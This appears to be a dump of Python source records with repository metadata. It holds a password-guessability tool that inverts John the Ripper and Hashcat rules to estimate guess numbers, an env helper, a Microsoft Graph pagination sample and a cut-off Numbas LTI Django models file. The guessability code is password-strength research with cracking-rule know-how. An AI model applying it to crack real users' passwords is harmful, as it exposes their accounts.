search_exist_data(pwd,enumerated_data_addr,external_bash_process) if len(ret_vals) != 0: is_guessable[pw_idx] = True for v in ret_vals: logging.info("\nPasswordIdx:{}\nPassword:{}\nRule:{}\nWord:{}\nGuess:{} ( {} - {} )\n".format(pw_idx, pwd, r.raw, v, *estimate_guess_number(counts, cumsum, v, r_idx, wordlist))) elif result.is_out_of_scope(): ret_vals = search_exist_data(pwd,enumerated_data_addr,external_bash_process) if len(ret_vals) != 0: is_guessable[pw_idx] = True for v in ret_vals: logging.info("\nPasswordIdx:{}\nPassword:{}\nRule:{}\nWord:{}\nGuess:{} ( {} - {} )\n".format(pw_idx, pwd, r.raw, v, *estimate_guess_number(counts, cumsum, v, r_idx, wordlist))) else: ret_vals = [] logging.info("Inversion error for {}(RL) {}(pw), error msg: {}\n".format(r.raw, pwd, result.error_msg)) print("Inversion error for {}(RL) {}(pw), error msg: {}".format(r.raw, pwd, result.error_msg)) else: # binary # where the binary file is stored enumerated_data_addr = "{}/enumerated/rule{}.txt".format(RUNTIME_CONFIG['preprocess_path'],r_idx) for token_pwd, (pw_idx, pwd) in zip(tokenized_pwds,not_filtered_pwds): ret_vals = search_exist_data(pwd,enumerated_data_addr,external_bash_process) if len(ret_vals) != 0: is_guessable[pw_idx] = True for v in ret_vals: logging.info("\nPasswordIdx:{}\nPassword:{}\nRule:{}\nWord:{}\nGuess:{} ( {} - {} )\n".format(pw_idx, pwd, r.raw, v, *estimate_guess_number(counts, cumsum, v, r_idx, wordlist))) ##################### End of Inversion ##################### # Write Not Guessable Data for pw_idx, pwd in filtered_pwds: logging.info("\nPasswordIdx:{}\nPassword:{}\nNot Guessable\n".format(pw_idx, pwd)) for is_guessed, (pw_idx, pwd) in zip(is_guessable, not_filtered_pwds): if is_guessed == False: logging.info("\nPasswordIdx:{}\nPassword:{}\nNot Guessable\n".format(pw_idx, pwd)) logging.info("Total guesses made by this configuration: {}\n".format(np.sum(counts))) print("Finished Inverting Rules, Total Time: {}".format(time.perf_counter()-i_time)) if __name__ == "__main__": main()
47.611765
205
0.627255
from sys import path as sys_path from os import path as os_path from subprocess import Popen, PIPE import time import logging import warnings import numpy as np sys_path.append(os_path.abspath('../src')) from config import RUNTIME_CONFIG from config import john_nick_names, hc_nick_names from common import PasswordPolicyConf, FilePath from argparsing import setup_args, parse_args from guess_count import GuessCount from tokenstr import TokenString from utility import read_passwords,read_wordlist,read_rulelist,get_look_cmd,build_trie_from_wordlist from utility import filter_passwords_with_password_policy from preprocess import precomputation from invert_rule import invert_one_rule from demo_common import match_inversion_result, search_exist_data, search_trie, estimate_guess_number def start_processing(): """ Take in a wordlist, rulelist and test set, outputs the guessability and guess number of each pwd in the test set. Steps: 1. read rulelist and do precomputation (detect invertibility) 2. read wordlist/pwlist, and get count for each rule 3. Rule Inversion (for each rule, invert all pwds) """ stime = time.perf_counter() ##################### Precomputation and Other Preparation ##################### # initialize a bash exe for communication external_bash_process = Popen(['/bin/bash'], stdin=PIPE, stdout=PIPE) # Logging Basic Info logging.basicConfig(filename=RUNTIME_CONFIG.get_log_addr(),level=logging.DEBUG) logging.info("Starting Time: {}\n\nConfigurations: {}\n".format(time.strftime("%Y-%m-%d %H:%M"), RUNTIME_CONFIG.short_config_string())) logging.info("PasswordPolicy: {}\n".format(RUNTIME_CONFIG['password_policy'].to_debug_string())) print("Reading Rulelist\n") rulelist = read_rulelist(RUNTIME_CONFIG['rulelist_path']['name'], RUNTIME_CONFIG['rulelist_path']['prefix']) print("Start Precomputation\n") rulelist = precomputation(rulelist) print("Reading Wordlist and Password Set\n") wordlist = read_wordlist(RUNTIME_CONFIG['wordlist_path']['name'], RUNTIME_CONFIG['wordlist_path']['prefix']) # Computing Guess Count counts, cumsum = GuessCount.get_counts(wordlist, rulelist, RUNTIME_CONFIG['preprocess_path']) # read other things pwlist = read_passwords(RUNTIME_CONFIG['pwlist_path']['addr']) # filter out pwds not consistent with the policy not_filtered_pwds, filtered_pwds = filter_passwords_with_password_policy(pwlist) trie = build_trie_from_wordlist(wordlist) ##################### Start Inversion ##################### print("Start Inverting Rules\n") i_time = time.perf_counter() # guessability of pwds is_guessable = [False] * len(pwlist) is_enable_regex = RUNTIME_CONFIG['enable_regex'] is_debug = RUNTIME_CONFIG['debug'] lookup_threshold = RUNTIME_CONFIG['lookup_threshold'] # tokenize pwds once. tokenized_pwds = [TokenString(pwd) for pw_idx, pwd in not_filtered_pwds] # invert rules (with special memory handling and other staff) for r_idx, r in enumerate(rulelist): if is_debug == True: print(r.raw) if r.feasibility.is_invertible(): # invertible, if blow up, use trie for token_pwd, (pw_idx, pwd) in zip(tokenized_pwds,not_filtered_pwds): result = invert_one_rule(token_pwd,r,is_enable_regex,r.feasibility.special_idx) if result.is_normal(): if result.get_number_of_strings() <= lookup_threshold: ret_vals = match_inversion_result(result, wordlist) else: ret_vals = search_trie(result, trie) if len(ret_vals) != 0: is_guessable[pw_idx] = True for v in ret_vals: logging.info("\nPasswordIdx:{}\nPassword:{}\nRule:{}\nWord:{}\nGuess:{} ( {} - {} )\n".format(pw_idx, pwd, r.raw, v, *estimate_guess_number(counts, cumsum, v, r_idx, wordlist))) elif result.is_out_of_scope(): ret_vals = [] logging.info("Inversion error for {}(RL) {}(pw), error msg: {}\n".format(r.raw, pwd, "out_of_scope")) print("Inversion error for {}(RL) {}(pw), error msg: {}".format(r.raw, pwd, "out_of_scope")) else: ret_vals = [] logging.info("Inversion error for {}(RL) {}(pw), error msg: {}\n".format(r.raw, pwd, result.error_msg)) print("Inversion error for {}(RL) {}(pw), error msg: {}".format(r.raw, pwd, result.error_msg)) elif r.feasibility.is_optimizable(): # uninvertible, if cannot handle, binary # where the binary file is stored enumerated_data_addr = "{}/enumerated/rule{}.txt".format(RUNTIME_CONFIG['preprocess_path'],r_idx) for token_pwd, (pw_idx, pwd) in zip(tokenized_pwds,not_filtered_pwds): result = invert_one_rule(token_pwd,r,is_enable_regex) if result.is_normal(): if result.get_number_of_strings() <= lookup_threshold: ret_vals = match_inversion_result(result, wordlist) else: ret_vals = search_exist_data(pwd,enumerated_data_addr,external_bash_process) if len(ret_vals) != 0: is_guessable[pw_idx] = True for v in ret_vals: logging.info("\nPasswordIdx:{}\nPassword:{}\nRule:{}\nWord:{}\nGuess:{} ( {} - {} )\n".format(pw_idx, pwd, r.raw, v, *estimate_guess_number(counts, cumsum, v, r_idx, wordlist))) elif result.is_out_of_scope(): ret_vals = search_exist_data(pwd,enumerated_data_addr,external_bash_process) if len(ret_vals) != 0: is_guessable[pw_idx] = True for v in ret_vals: logging.info("\nPasswordIdx:{}\nPassword:{}\nRule:{}\nWord:{}\nGuess:{} ( {} - {} )\n".format(pw_idx, pwd, r.raw, v, *estimate_guess_number(counts, cumsum, v, r_idx, wordlist))) else: ret_vals = [] logging.info("Inversion error for {}(RL) {}(pw), error msg: {}\n".format(r.raw, pwd, result.error_msg)) print("Inversion error for {}(RL) {}(pw), error msg: {}".format(r.raw, pwd, result.error_msg)) else: # binary # where the binary file is stored enumerated_data_addr = "{}/enumerated/rule{}.txt".format(RUNTIME_CONFIG['preprocess_path'],r_idx) for token_pwd, (pw_idx, pwd) in zip(tokenized_pwds,not_filtered_pwds): ret_vals = search_exist_data(pwd,enumerated_data_addr,external_bash_process) if len(ret_vals) != 0: is_guessable[pw_idx] = True for v in ret_vals: logging.info("\nPasswordIdx:{}\nPassword:{}\nRule:{}\nWord:{}\nGuess:{} ( {} - {} )\n".format(pw_idx, pwd, r.raw, v, *estimate_guess_number(counts, cumsum, v, r_idx, wordlist))) ##################### End of Inversion ##################### # Write Not Guessable Data for pw_idx, pwd in filtered_pwds: logging.info("\nPasswordIdx:{}\nPassword:{}\nNot Guessable\n".format(pw_idx, pwd)) for is_guessed, (pw_idx, pwd) in zip(is_guessable, not_filtered_pwds): if is_guessed == False: logging.info("\nPasswordIdx:{}\nPassword:{}\nNot Guessable\n".format(pw_idx, pwd)) logging.info("Total guesses made by this configuration: {}\n".format(np.sum(counts))) print("Finished Inverting Rules, Total Time: {}".format(time.perf_counter()-i_time)) def main(): args = setup_args() # set up args try: parse_args(args) # parse args except: raise print("Your Running Configuration: {}\n".format(RUNTIME_CONFIG.short_config_string())) start_processing() if __name__ == "__main__": main()
220
0
23
333a2f2f140534cc1d6698425fb54de5fcbfec93
642
py
Python
utils/env.py
Omarzintan/bumblebee-ai
0b8c5cecf032730e23b1b710a88538f5e4ea70c9
[ "MIT" ]
3
2021-05-06T16:29:26.000Z
2022-01-09T03:32:40.000Z
utils/env.py
Omarzintan/bumblebee-ai
0b8c5cecf032730e23b1b710a88538f5e4ea70c9
[ "MIT" ]
1
2021-05-20T17:59:12.000Z
2021-05-20T17:59:12.000Z
utils/env.py
Omarzintan/bumblebee-ai
0b8c5cecf032730e23b1b710a88538f5e4ea70c9
[ "MIT" ]
null
null
null
''' This file is for retrieving system environment variables and helper variables directly derived from them. In decreasing order of precedence, environment variables can be set by: 1. adding them to .env file at root of this project 2. exporting and then running bumblebee in then same terminal. E.g. export BUMBLEBEE_ENV=local; bumblebee 3. prefixing 'bumblebee' command with the environment variable when running. E.g. BUMBLEBEE_ENV=local bumblebee ''' from dotenv import load_dotenv import os load_dotenv() bumblebee_environment = os.environ.get('BUMBLEBEE_ENV', 'production').lower() is_local = bumblebee_environment == 'local'
33.789474
77
0.78972
''' This file is for retrieving system environment variables and helper variables directly derived from them. In decreasing order of precedence, environment variables can be set by: 1. adding them to .env file at root of this project 2. exporting and then running bumblebee in then same terminal. E.g. export BUMBLEBEE_ENV=local; bumblebee 3. prefixing 'bumblebee' command with the environment variable when running. E.g. BUMBLEBEE_ENV=local bumblebee ''' from dotenv import load_dotenv import os load_dotenv() bumblebee_environment = os.environ.get('BUMBLEBEE_ENV', 'production').lower() is_local = bumblebee_environment == 'local'
0
0
0
248e74a35b18bd30f4803c6ed6fcc98efb31c3af
1,701
py
Python
pagination.py
billaanil3/Paginization
4556634517841bc1104fd1a015beda04c16d5322
[ "MIT" ]
11
2017-11-28T22:26:55.000Z
2022-03-21T15:42:41.000Z
pagination.py
billaanil3/Paginization
4556634517841bc1104fd1a015beda04c16d5322
[ "MIT" ]
3
2017-11-28T21:05:48.000Z
2019-04-02T22:38:48.000Z
pagination.py
billaanil3/Paginization
4556634517841bc1104fd1a015beda04c16d5322
[ "MIT" ]
8
2017-11-28T17:23:39.000Z
2021-11-19T15:41:18.000Z
"""Pagination sample for Microsoft Graph.""" # Copyright (c) Microsoft. All rights reserved. Licensed under the MIT license. # See LICENSE in the project root for license information. import os import bottle import graphrest import config MSGRAPH = graphrest.GraphSession(client_id=config.CLIENT_ID, client_secret=config.CLIENT_SECRET, redirect_uri=config.REDIRECT_URI, scopes=['User.Read', 'Mail.Read']) bottle.TEMPLATE_PATH = ['./static/templates'] @bottle.route('/') @bottle.view('homepage.html') def homepage(): """Render the home page.""" return {'title': 'Pagination Basics'} @bottle.route('/login') def login(): """Prompt user to authenticate.""" endpoint = MSGRAPH.api_endpoint('me/messages') MSGRAPH.login(login_redirect=f'/pagination?endpoint={endpoint}') @bottle.route('/login/authorized') def authorized(): """Handler for the application's Redirect URI.""" MSGRAPH.redirect_uri_handler() @bottle.route('/pagination') @bottle.view('pagination.html') def pagination(): """Example of paginated response from Microsoft Graph.""" endpoint = bottle.request.query.endpoint graphdata = MSGRAPH.get(endpoint).json() return {'graphdata': graphdata} @bottle.route('/static/<filepath:path>') def server_static(filepath): """Handler for static files, used with the development server.""" root_folder = os.path.abspath(os.path.dirname(__file__)) return bottle.static_file(filepath, root=os.path.join(root_folder, 'static')) if __name__ == '__main__': bottle.run(app=bottle.app(), server='wsgiref', host='localhost', port=5000)
29.327586
81
0.681952
"""Pagination sample for Microsoft Graph.""" # Copyright (c) Microsoft. All rights reserved. Licensed under the MIT license. # See LICENSE in the project root for license information. import os import bottle import graphrest import config MSGRAPH = graphrest.GraphSession(client_id=config.CLIENT_ID, client_secret=config.CLIENT_SECRET, redirect_uri=config.REDIRECT_URI, scopes=['User.Read', 'Mail.Read']) bottle.TEMPLATE_PATH = ['./static/templates'] @bottle.route('/') @bottle.view('homepage.html') def homepage(): """Render the home page.""" return {'title': 'Pagination Basics'} @bottle.route('/login') def login(): """Prompt user to authenticate.""" endpoint = MSGRAPH.api_endpoint('me/messages') MSGRAPH.login(login_redirect=f'/pagination?endpoint={endpoint}') @bottle.route('/login/authorized') def authorized(): """Handler for the application's Redirect URI.""" MSGRAPH.redirect_uri_handler() @bottle.route('/pagination') @bottle.view('pagination.html') def pagination(): """Example of paginated response from Microsoft Graph.""" endpoint = bottle.request.query.endpoint graphdata = MSGRAPH.get(endpoint).json() return {'graphdata': graphdata} @bottle.route('/static/<filepath:path>') def server_static(filepath): """Handler for static files, used with the development server.""" root_folder = os.path.abspath(os.path.dirname(__file__)) return bottle.static_file(filepath, root=os.path.join(root_folder, 'static')) if __name__ == '__main__': bottle.run(app=bottle.app(), server='wsgiref', host='localhost', port=5000)
0
0
0
d7ba520906466c429eb7e964cc54b23a09f4bd0c
27,726
py
Python
numbas_lti/models.py
pbh4/numbas_leicester
bac5c66c0c7809ee9588a69b3bced4244cee08e5
[ "Apache-2.0" ]
null
null
null
numbas_lti/models.py
pbh4/numbas_leicester
bac5c66c0c7809ee9588a69b3bced4244cee08e5
[ "Apache-2.0" ]
null
null
null
numbas_lti/models.py
pbh4/numbas_leicester
bac5c66c0c7809ee9588a69b3bced4244cee08e5
[ "Apache-2.0" ]
null
null
null
from django.conf import settings from django.db import models from django.dispatch import receiver from django.contrib.auth.models import User import requests from django.utils.text import slugify from django.utils.translation import ugettext_lazy as _, ugettext from django.core import validators from channels import Group, Channel from django.utils import timezone from datetime import timedelta,datetime from django_auth_lti.patch_reverse import reverse from .groups import group_for_attempt from .report_outcome import report_outcome_for_attempt, ReportOutcomeFailure, ReportOutcomeConnectionError import os import shutil from zipfile import ZipFile from lxml import etree import re import json from collections import defaultdict @receiver(models.signals.post_save) # Create your models here. @receiver(models.signals.pre_save, sender=Exam) GRADING_METHODS = [ ('highest',_('Highest score')), ('last',_('Last attempt')), ] REPORT_TIMES = [ ('immediately',_('Immediately')), ('oncompletion',_('On completion')), ('manually',_('Manually, by instructor')), ] REPORTING_STATUSES = [ ('reporting',_('Reporting scores')), ('error',_('Error encountered')), ('complete',_('All scores reported')), ] SHOW_SCORES_MODES = [ ('always',_('Always')), ('complete',_('When attempt is complete')), ('never',_('Never')), ] COMPLETION_STATUSES = [ ('not attempted',_('Not attempted')), ('incomplete',_('Incomplete')), ('completed',_('Complete')), ] models.signals.post_save.connect(remark_update_scaled_score,sender=RemarkPart) models.signals.post_delete.connect(remark_update_scaled_score,sender=RemarkPart) DISCOUNT_BEHAVIOURS = [ ('remove','Remove from total'), ('fullmarks','Award everyone full credit'), ] models.signals.post_save.connect(discount_update_scaled_score,sender=DiscountPart) models.signals.post_delete.connect(discount_update_scaled_score,sender=DiscountPart) @receiver(models.signals.post_save,sender=ScormElement) @receiver(models.signals.post_save,sender=ScormElement) @receiver(models.signals.post_save,sender=ScormElement) @receiver(models.signals.post_save,sender=ScormElement) def scorm_set_num_questions(sender,instance,created,**kwargs): """ Set the number of questions for this resource - can only work this out once the exam has been run! """ if not re.match(r'^cmi.objectives.([0-9]+).id$',instance.key) or not created: return number = int(re.match(r'q(\d+)',instance.value).group(1))+1 resource = instance.attempt.resource if number>resource.num_questions: resource.num_questions = number resource.save() @receiver(models.signals.pre_save,sender=EditorLink)
40.773529
197
0.68351
from django.conf import settings from django.db import models from django.dispatch import receiver from django.contrib.auth.models import User import requests from django.utils.text import slugify from django.utils.translation import ugettext_lazy as _, ugettext from django.core import validators from channels import Group, Channel from django.utils import timezone from datetime import timedelta,datetime from django_auth_lti.patch_reverse import reverse from .groups import group_for_attempt from .report_outcome import report_outcome_for_attempt, ReportOutcomeFailure, ReportOutcomeConnectionError import os import shutil from zipfile import ZipFile from lxml import etree import re import json from collections import defaultdict class NotDeletedManager(models.Manager): def get_queryset(self): return super(NotDeletedManager,self).get_queryset().filter(deleted=False) class LTIConsumer(models.Model): url = models.URLField(blank=True,default='',verbose_name='Home URL of consumer') key = models.CharField(max_length=100,unique=True,verbose_name=_('Consumer key'),help_text=_('The key should be human-readable, and uniquely identify this consumer.')) secret = models.CharField(max_length=100,verbose_name=_('Shared secret')) deleted = models.BooleanField(default=False) objects = NotDeletedManager() def __str__(self): return self.key @property def resources(self): return Resource.objects.filter(context__consumer=self) class ExtractPackageMixin(object): extract_folder = 'extracted_zips' @property def extracted_path(self): return os.path.join(settings.MEDIA_ROOT,self.extract_folder,self.__class__.__name__,str(self.pk)) @property def extracted_url(self): return '{}{}/{}/{}'.format(settings.MEDIA_URL,self.extract_folder,self.__class__.__name__,str(self.pk)) @receiver(models.signals.post_save) def extract_package(sender,instance,**kwargs): if not issubclass(sender,ExtractPackageMixin): return if os.path.exists(instance.extracted_path): shutil.rmtree(instance.extracted_path) os.makedirs(instance.extracted_path) z = ZipFile(instance.package.file,'r') z.extractall(instance.extracted_path) # Create your models here. class Exam(ExtractPackageMixin,models.Model): title = models.CharField(max_length=300) package = models.FileField(upload_to='exams/',verbose_name='Package file') retrieve_url = models.URLField(blank=True,default='',verbose_name='URL used to retrieve the exam package') rest_url = models.URLField(blank=True,default='',verbose_name='URL of the exam on the editor\'s REST API') creation_time = models.DateTimeField(auto_now_add=True, verbose_name=_('Time this exam was created')) def __str__(self): return self.title @receiver(models.signals.pre_save, sender=Exam) def set_exam_name_from_package(sender,instance,**kwargs): z = ZipFile(instance.package.file,'r') with z.open('imsmanifest.xml','r') as manifest_file: manifest = etree.parse(manifest_file) instance.title = manifest.find('.//ims:title',namespaces={'ims':'http://www.imsglobal.org/xsd/imscp_v1p1'}).text GRADING_METHODS = [ ('highest',_('Highest score')), ('last',_('Last attempt')), ] REPORT_TIMES = [ ('immediately',_('Immediately')), ('oncompletion',_('On completion')), ('manually',_('Manually, by instructor')), ] REPORTING_STATUSES = [ ('reporting',_('Reporting scores')), ('error',_('Error encountered')), ('complete',_('All scores reported')), ] SHOW_SCORES_MODES = [ ('always',_('Always')), ('complete',_('When attempt is complete')), ('never',_('Never')), ] class LTIContext(models.Model): consumer = models.ForeignKey(LTIConsumer,related_name='contexts', on_delete=models.CASCADE) context_id = models.CharField(max_length=300) name = models.CharField(max_length=300) label = models.CharField(max_length=300) instance_guid = models.CharField(max_length=300) def __str__(self): if self.name == self.label: return self.name else: return '{} ({})'.format(self.name, self.label) class Resource(models.Model): resource_link_id = models.CharField(max_length=300) exam = models.ForeignKey(Exam,blank=True,null=True,on_delete=models.SET_NULL) context = models.ForeignKey(LTIContext,blank=True,null=True,on_delete=models.SET_NULL,related_name='resources') title = models.CharField(max_length=300,default='') description = models.TextField(default='') creation_time = models.DateTimeField(auto_now_add=True, verbose_name=_('Time this resource was created')) grading_method = models.CharField(max_length=20,choices=GRADING_METHODS,default='highest',verbose_name=_('Grading method')) include_incomplete_attempts = models.BooleanField(default=True,verbose_name=_('Include incomplete attempts in grading?')) show_marks_when = models.CharField(max_length=20, default='always', choices=SHOW_SCORES_MODES, verbose_name=_('When to show scores to students')) report_mark_time = models.CharField(max_length=20,choices=REPORT_TIMES,default='immediately',verbose_name=_('When to report scores back')) max_attempts = models.PositiveIntegerField(default=0,verbose_name=_('Maximum attempts per user')) num_questions = models.PositiveIntegerField(default=0) class Meta: ordering = ['-creation_time','title'] def __str__(self): if self.exam: return str(self.exam) elif self.context: return _('Resource in "{}" - no exam uploaded').format(self.context.name) else: return ugettext('Resource with no context') @property def slug(self): if self.exam: return slugify(self.exam.title) else: return 'resource' def grade_user(self,user): methods = { 'highest': self.grade_highest, 'last': self.grade_last, } attempts = self.attempts.filter(user=user) if not self.include_incomplete_attempts: attempts = attempts.filter(completion_status='completed') if not attempts.exists(): return 0 return methods[self.grading_method](user,attempts) def grade_highest(self,user,attempts): return attempts.aggregate(highest_score=models.Max('scaled_score'))['highest_score'] def grade_last(self,user,attempts): return attempts.order_by('-start_time').first() def students(self): return User.objects.filter(attempts__resource=self).distinct().order_by('last_name','first_name') def can_start_new_attempt(self,user): if self.max_attempts==0: return True return self.attempts.filter(user=user).count()<self.max_attempts or AccessToken.objects.filter(resource=self,user=user).exists() def user_data(self,user): return LTIUserData.objects.filter(resource=self,user=user).last() def part_hierarchy(self): """ Returns an object { question_num: { part_num: { gaps: [list of gap indices], steps: [list of step indices] } } } """ paths = sorted(set(e['value'] for e in ScormElement.objects.filter(attempt__resource=self,key__regex=r'cmi.interactions.[0-9]+.id').values('value')),key=lambda x:(len(x),x)) re_path = re.compile(r'q([0-9]+)p([0-9]+)(?:g([0-9]+)|s([0-9]+))?') out = defaultdict(lambda: defaultdict(lambda: {'gaps':[],'steps':[]})) for path in paths: m = re_path.match(path) question_index = m.group(1) part_index = m.group(2) gap_index = m.group(3) step_index = m.group(4) p = out[question_index][part_index] if m.group(3): p['gaps'].append(gap_index) elif m.group(4): p['steps'].append(step_index) return out def last_activity(self): if self.attempts.exists(): return self.attempts.order_by('-start_time').first().start_time else: return self.creation_time def time_since_last_activity(self): now = timezone.now() diff = now - self.last_activity() return diff def is_new(self): return self.time_since_last_activity().days < 7 def is_old(self): return self.time_since_last_activity().days > 14 class ReportProcess(models.Model): resource = models.ForeignKey(Resource,on_delete=models.CASCADE,related_name='report_processes') status = models.CharField(max_length=10,choices=REPORTING_STATUSES,default='reporting',verbose_name=_("Current status of the process")) time = models.DateTimeField(auto_now_add=True,verbose_name=_("Time the reporting process started")) response = models.TextField(blank=True,verbose_name=_("Description of any error")) dismissed = models.BooleanField(default=False,verbose_name=_('Has the result of this process been dismissed by the instructor?')) class Meta: ordering = ['-time',] COMPLETION_STATUSES = [ ('not attempted',_('Not attempted')), ('incomplete',_('Incomplete')), ('completed',_('Complete')), ] class AccessToken(models.Model): user = models.ForeignKey(User,on_delete=models.CASCADE,related_name='access_tokens') resource = models.ForeignKey(Resource,on_delete=models.CASCADE,related_name='access_tokens') class LTIUserData(models.Model): consumer = models.ForeignKey(LTIConsumer,on_delete=models.CASCADE,null=True) user = models.ForeignKey(User,on_delete=models.CASCADE,related_name='lti_data') resource = models.ForeignKey(Resource,on_delete=models.CASCADE) lis_result_sourcedid = models.CharField(max_length=200,default='',blank=True,null=True) lis_outcome_service_url = models.TextField(default='',blank=True,null=True) last_reported_score = models.FloatField(default=0) consumer_user_id = models.TextField(default='',blank=True,null=True) class Attempt(models.Model): resource = models.ForeignKey(Resource,on_delete=models.CASCADE,related_name='attempts') exam = models.ForeignKey(Exam,on_delete=models.CASCADE,related_name='attempts',null=True) # need to keep track of both resource and exam in case the exam later gets overwritten user = models.ForeignKey(User,on_delete=models.CASCADE,related_name='attempts') start_time = models.DateTimeField(auto_now_add=True) end_time = models.DateTimeField(blank=True,null=True) completion_status = models.CharField(max_length=20,choices=COMPLETION_STATUSES,default='not attempted') completion_status_element = models.ForeignKey("ScormElement", on_delete=models.SET_NULL, related_name="current_completion_status_of", null=True) scaled_score = models.FloatField(default=0) scaled_score_element = models.ForeignKey("ScormElement", on_delete=models.SET_NULL, related_name="current_scaled_score_of", null=True) deleted = models.BooleanField(default=False) broken = models.BooleanField(default=False) objects = NotDeletedManager() class Meta: ordering = ['-start_time',] def __str__(self): return 'Attempt by "{}" on "{}"'.format(self.user,self.resource) def get_element_default(self,key,default=None): try: return self.scormelements.current(key).value except ScormElement.DoesNotExist: return default def completed(self): return self.completion_status=='completed' @property def raw_score(self): if self.remarked_parts.exists() or self.resource.discounted_parts.exists(): total = 0 for i in range(self.resource.num_questions): total += self.question_raw_score(i) return total return float(self.get_element_default('cmi.score.raw',0)) @property def max_score(self): if self.resource.discounted_parts.exists(): total = 0 for i in range(self.resource.num_questions): total += self.question_max_score(i) return total return float(self.get_element_default('cmi.score.max',sum(self.question_max_score(i) for i in range(self.resource.num_questions)))) def part_discount(self,part): return self.resource.discounted_parts.filter(part=part).first() def part_paths(self): return set(e['value'] for e in self.scormelements.filter(key__regex='cmi.interactions.[0-9]+.id').values('value').distinct()) def part_hierarchy(self): """ Returns an object { question_num: { part_num: { gaps: [list of gap indices], steps: [list of step indices] } } } """ paths = sorted(self.part_paths(),key=lambda x:(len(x),x)) re_path = re.compile('q(\d+)p(\d+)(?:g(\d+)|s(\d+))?') out = defaultdict(lambda: defaultdict(lambda: {'gaps':[],'steps':[]})) for path in paths: m = re_path.match(path) p = out[m.group(1)][m.group(2)] if m.group(3): p['gaps'].append(m.group(3)) elif m.group(4): p['steps'].append(m.group(4)) return out def part_gaps(self,part): if not re.match(r'q\d+p\d+$',part): return None gaps = [g for g in self.part_paths() if g.startswith(part+'g')] return gaps def part_interaction_id(self,part): id_element = self.scormelements.filter(key__regex='cmi.interactions.[0-9]+.id',value=part).first() n = re.match(r'cmi.interactions.(\d+).id',id_element.key).group(1) return n def part_raw_score(self,part): discounted = self.part_discount(part) if discounted: return self.part_max_score(part) remarked = self.remarked_parts.filter(part=part) if remarked.exists(): return remarked.get().score if self.remarked_parts.filter(part__startswith=part+'g').exists() or self.resource.discounted_parts.filter(part__startswith=part+'g').exists(): gaps = self.part_gaps(part) return sum(self.part_raw_score(g) for g in gaps) try: id = self.part_interaction_id(part) except ScormElement.DoesNotExist: return 0 score = self.get_element_default('cmi.interactions.{}.result'.format(id),0) return float(score) def part_max_score(self,part): discounted = self.part_discount(part) if discounted: if discounted.behaviour == 'remove': return 0 if DiscountPart.objects.filter(part__startswith=part+'g').exists(): gaps = self.part_gaps(part) return sum(self.part_max_score(g) for g in gaps) try: id = self.part_interaction_id(part) except ScormElement.DoesNotExist: return 0 return float(self.get_element_default('cmi.interactions.{}.weighting'.format(id),0)) def question_raw_score(self,n): _,raw,_,_ = self.calculate_question_score_info(n) return raw def calculate_question_score_info(self,n): qid = 'q{}'.format(n) if self.remarked_parts.filter(part__startswith=qid).exists() or self.resource.discounted_parts.filter(part__startswith=qid).exists(): question_parts = [p for p in self.part_paths() if p.startswith(qid)] total_raw = 0.0 total_max = 0.0 for part in question_parts: if re.match(r'^q{}p\d+$'.format(n),part): total_raw += self.part_raw_score(part) total_max += self.part_max_score(part) raw_score = total_raw scaled_score = total_raw/total_max if total_max>0 else 0.0 max_score = total_max else: raw_score = float(self.get_element_default('cmi.objectives.{}.score.raw'.format(n),0)) scaled_score = float(self.get_element_default('cmi.objectives.{}.score.scaled'.format(n),0)) max_score = float(self.get_element_default('cmi.objectives.{}.score.max'.format(n),0)) completion_status = self.get_element_default('cmi.objectives.{}.completion_status'.format(n),'not attempted') return (scaled_score, raw_score, max_score, completion_status) def update_question_score_info(self,n): scaled_score,raw_score,max_score,completion_status = self.calculate_question_score_info(n) AttemptQuestionScore.objects.update_or_create(attempt=self,number=n,defaults={'scaled_score':scaled_score,'raw_score':raw_score,'max_score':max_score,'completion_status':completion_status}) def question_score_info(self,n): try: return self.cached_question_scores.get(number=n) except AttemptQuestionScore.DoesNotExist: scaled_score, raw_score, max_score, completion_status = self.calculate_question_score_info(n) aqs = AttemptQuestionScore.objects.create(attempt = self, number = n, raw_score = raw_score, scaled_score = scaled_score, max_score = max_score, completion_status = completion_status) return aqs except AttemptQuestionScore.MultipleObjectsReturned: aqs = self.cached_question_scores.filter(number=n) n = aqs.count() aq = aqs[n] aqs[:n].delete() return aq def question_numbers(self): questions = self.scormelements.filter(key__regex='cmi.objectives.[0-9]+.id').values('key').distinct() re_number = re.compile(r'cmi.objectives.([0-9]+).id') numbers = sorted(set([re_number.match(q['key']).group(1) for q in questions])) return numbers def question_scores(self): return sorted([self.question_score_info(n) for n in self.question_numbers()],key=lambda x:int(x.number)) def question_max_score(self,n): _,_,max_score,_ = self.calculate_question_score_info(n) return max_score def channels_group(self): return 'attempt-{}'.format(self.pk) def should_show_scores(self): return self.resource.show_marks_when=='always' or (self.resource.show_marks_when=='complete' and self.completed()) class AttemptQuestionScore(models.Model): attempt = models.ForeignKey(Attempt,related_name='cached_question_scores', on_delete=models.CASCADE) number = models.IntegerField() raw_score = models.FloatField() scaled_score = models.FloatField() max_score = models.FloatField() completion_status = models.CharField(default='not attempted',max_length=20) class Meta: unique_together = (('attempt','number'),) def __str__(self): return '{}/{} on question {} of {}'.format(self.raw_score,self.max_score,self.number,self.attempt) class RemarkPart(models.Model): attempt = models.ForeignKey(Attempt,related_name='remarked_parts', on_delete=models.CASCADE) part = models.CharField(max_length=20) score = models.FloatField() def __str__(self): return '{} on part {} in {}'.format(self.score, self.part, self.attempt) def remark_update_scaled_score(sender,instance,**kwargs): attempt = instance.attempt question = int(re.match(r'^q(\d+)p\d+$',instance.part).group(1)) attempt.update_question_score_info(question) if attempt.max_score>0: scaled_score = attempt.raw_score/attempt.max_score else: scaled_score = 0 if scaled_score != attempt.scaled_score: attempt.scaled_score = scaled_score attempt.save() models.signals.post_save.connect(remark_update_scaled_score,sender=RemarkPart) models.signals.post_delete.connect(remark_update_scaled_score,sender=RemarkPart) DISCOUNT_BEHAVIOURS = [ ('remove','Remove from total'), ('fullmarks','Award everyone full credit'), ] class DiscountPart(models.Model): resource = models.ForeignKey(Resource,related_name='discounted_parts', on_delete=models.CASCADE) part = models.CharField(max_length=20) behaviour = models.CharField(max_length=10,choices=DISCOUNT_BEHAVIOURS,default='remove') def discount_update_scaled_score(sender,instance,**kwargs): for attempt in instance.resource.attempts.all(): question = int(re.match(r'^q(\d+)p\d+$',instance.part).group(1)) attempt.update_question_score_info(question) scaled_score = attempt.raw_score/attempt.max_score if scaled_score != attempt.scaled_score: attempt.scaled_score = scaled_score attempt.save() models.signals.post_save.connect(discount_update_scaled_score,sender=DiscountPart) models.signals.post_delete.connect(discount_update_scaled_score,sender=DiscountPart) class 